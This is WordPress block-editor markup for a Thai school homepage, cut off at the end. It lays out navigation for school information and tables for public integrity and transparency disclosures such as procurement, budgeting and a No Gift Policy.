{\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"lef